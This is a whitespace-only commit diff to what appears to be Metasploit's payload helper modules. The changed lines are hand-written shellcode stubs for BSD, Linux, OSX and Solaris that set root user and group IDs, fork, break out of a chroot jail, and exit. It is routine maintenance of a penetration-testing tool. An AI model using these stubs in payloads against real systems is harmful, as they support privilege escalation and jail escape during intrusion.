fix more whitespace issues

Brent Cook 2018-05-01 05:23:26 -05:00
parent 34f8a9a5ee
commit 1456bbdaec
5 changed files with 269 additions and 269 deletions


@ -93,69 +93,69 @@ module Msf::Payload::Bsd
def handle_x64_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4d" +# or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" +# shl rax, 2
"\x48\x83\xf0\x03" +# xor rax, 3 (311&3=3)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4d" + # or rax, 77 (setgid=311>>2=77)
"\x48\xc1\xe0\x02" + # shl rax, 2
"\x48\x83\xf0\x03" + # xor rax, 3 (311&3=3)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7e" +# or rax, 126 (setreuid=126)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7e" + # or rax, 126 (setreuid=126)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x17" +# or rax, 23 (setuid=23)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x17" + # or rax, 23 (setuid=23)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x4e" +# or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" +# shl rax, 2 (78<<2=312)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x48\x31\xd2" +# xor rdx, rdx 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x4e" + # or rax, 78 (setgid=312>>2=78)
"\x48\xc1\xe0\x02" + # shl rax, 2 (78<<2=312)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x48\x31\xd2" + # xor rdx, rdx 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x7f" +# or rax, 127 (setuid=127)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x7f" + # or rax, 127 (setuid=127)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x5a" +# or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" +# shl rax, 1
"\x48\x83\xc8\x01" +# or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x5a" + # or rax, 90 (setgid=181>>1=90)
"\x48\xd1\xe0" + # shl rax, 1
"\x48\x83\xc8\x01" + # or rax, 1 (setgid=181&1=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x48\x31\xc0" +# xor rax, rax
"\x48\x83\xc8\x01" +# or rax, 1 (exit=1)
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x48\x31\xc0" + # xor rax, rax
"\x48\x83\xc8\x01" + # or rax, 1 (exit=1)
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end


@ -59,70 +59,70 @@ module X86
def handle_x86_bsd_opts(pre, app)
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x37\x01" + # movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x38\x01" +# movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x66\xb8\x38\x01" + # movw $0x0138,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end


@ -99,113 +99,113 @@ module Msf::Payload::Linux
# Prepend
if (datastore['PrependFork'])
pre << "\x6a\x02" +# pushb $0x2 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 ; fork #
"\x85\xc0" +# test %eax,%eax #
"\x74\x06" +# jz 0xf #
"\x31\xc0" +# xor %eax,%eax #
"\xb0\x01" +# movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
pre << "\x6a\x02" + # pushb $0x2 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 ; fork #
"\x85\xc0" + # test %eax,%eax #
"\x74\x06" + # jz 0xf #
"\x31\xc0" + # xor %eax,%eax #
"\xb0\x01" + # movb $0x1,%al ; exit #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xa4" +# movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xa4" + # movb $0xa4,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x17" +# pushl $0x17 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x17" + # pushl $0x17 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\xf7\xe3" +# mull %ebx #
"\xb0\xaa" +# movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\xf7\xe3" + # mull %ebx #
"\xb0\xaa" + # movb $0xaa,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x47" +# pushl $0x47 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x47" + # pushl $0x47 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x2e" +# pushl $0x2e #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x2e" + # pushl $0x2e #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x31\xc9" +# xorl %ecx,%ecx #
"\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x46" +# pushl $0x46 #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc9" + # xorl %ecx,%ecx #
"\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x46" + # pushl $0x46 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
# break chroot
pre << "\x6a\x3d" +# pushl $0x3d #
pre << "\x6a\x3d" + # pushl $0x3d #
# build dir str (ptr in ebx)
"\x89\xe3" +# movl %esp,%ebx #
"\x89\xe3" + # movl %esp,%ebx #
# mkdir(dir)
"\x6a\x27" +# pushl $0x27 #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x6a\x27" + # pushl $0x27 #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# chroot(dir)
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" +# int $0x80 #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" + # int $0x80 #
# build ".." str (ptr in ebx)
"\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
"\x89\xe3" +# movl %esp,%ebx #
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
"\x89\xe3" + # movl %esp,%ebx #
# loop changing dir
"\x6a\x3d" +# pushl $0x1e #
"\x59" +# popl %ecx #
"\xb0\x0c" +# movb $0xc,%al #
"\xcd\x80" +# int $0x80 #
"\xe2\xfa" +# loop -6 #
"\x6a\x3d" + # pushl $0x1e #
"\x59" + # popl %ecx #
"\xb0\x0c" + # movb $0xc,%al #
"\xcd\x80" + # int $0x80 #
"\xe2\xfa" + # loop -6 #
# final chroot
"\x6a\x3d" +# pushl $0x3d #
"\x89\xd9" +# movl %ebx,%ecx #
"\x58" +# popl %eax #
"\xcd\x80" # int $0x80 #
"\x6a\x3d" + # pushl $0x3d #
"\x89\xd9" + # movl %ebx,%ecx #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
# Append exit(0)
if (datastore['AppendExit'])
app << "\x31\xdb" +# xorl %ebx,%ebx #
"\x6a\x01" +# pushl $0x01 #
"\x58" +# popl %eax #
app << "\x31\xdb" + # xorl %ebx,%ebx #
"\x6a\x01" + # pushl $0x01 #
"\x58" + # popl %eax #
"\xcd\x80" # int $0x80 #
end
@ -216,65 +216,65 @@ module Msf::Payload::Linux
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetresgid'])
# setresgid(0, 0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
"\x44\xff\xff\x02" # sc #
end
if (datastore['PrependChrootBreak'])
# setreuid(0, 0)
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
"\x44\xff\xff\x02" # sc #
# EEK! unsupported...
end
@ -282,10 +282,10 @@ module Msf::Payload::Linux
# Append exit(0)
if (datastore['AppendExit'])
app << "\x3b\xe0\x01\xff" +# li r31,511 #
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
app << "\x3b\xe0\x01\xff" + # li r31,511 #
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
"\x44\xff\xff\x02" # sc #
end
elsif (test_arch.include?(ARCH_X64))


@ -78,48 +78,48 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7e" + # movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7f" +# movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\x7f" + # movb $0x7f,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xb5" +# movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xb5" + # movb $0xb5,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xcd\x80" # int $0x80 #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xcd\x80" # int $0x80 #
end
end
@ -127,56 +127,56 @@ module Msf::Payload::Osx
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x48\x31\xf6" +# xor rsi, rsi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x48\x31\xf6" + # xor rsi, rsi 0
"\x0f\x05" # syscall
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" +# shl r8, 23
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" +# shl r8, 1
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x17" + # shl r8, 23
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
"\x49\xd1\xe0" + # shl r8, 1
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
if (datastore['AppendExit'])
# exit(0)
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" +# shl r8, 24
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
"\x4c\x89\xc0" +# mov rax, r8
"\x48\x31\xff" +# xor rdi, rdi 0
"\x0f\x05" # syscall
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
"\x49\xc1\xe0\x18" + # shl r8, 24
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
"\x4c\x89\xc0" + # mov rax, r8
"\x48\x31\xff" + # xor rdi, rdi 0
"\x0f\x05" # syscall
end
end


@ -75,55 +75,55 @@ module Msf::Payload::Solaris
if (test_arch.include?(ARCH_X86))
# Syscall code
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
"\x6a\x65" +# pushl $0x65 #
"\x89\xe6" +# movl %esp,%esi #
"\xf7\x56\x04" +# notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
"\x6a\x65" + # pushl $0x65 #
"\x89\xe6" + # movl %esp,%esi #
"\xf7\x56\x04" + # notl 0x04(%esi) #
"\xf6\x16" # notb (%esi) #
# Prepend
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xca" +# movb $0xca,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xca" + # movb $0xca,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x17" + # movb $0x17,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetregid'])
# setregid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\xcb" +# movb $0xcb,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\x50" + # pushl %eax #
"\xb0\xcb" + # movb $0xcb,%al #
"\xff\xd6" # call *%esi #
end
if (datastore['PrependSetgid'])
# setgid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x2e" +# movb $0x2e,%al #
"\xff\xd6" # call *%esi #
pre << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x2e" + # movb $0x2e,%al #
"\xff\xd6" # call *%esi #
end
# Append
if (datastore['AppendExit'])
# exit(0)
app << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\xb0\x01" +# movb $0x01,%al #
"\xff\xd6" # call *%esi #
app << "\x31\xc0" + # xorl %eax,%eax #
"\x50" + # pushl %eax #
"\xb0\x01" + # movb $0x01,%al #
"\xff\xd6" # call *%esi #
end
# Prepend syscall code to prepend block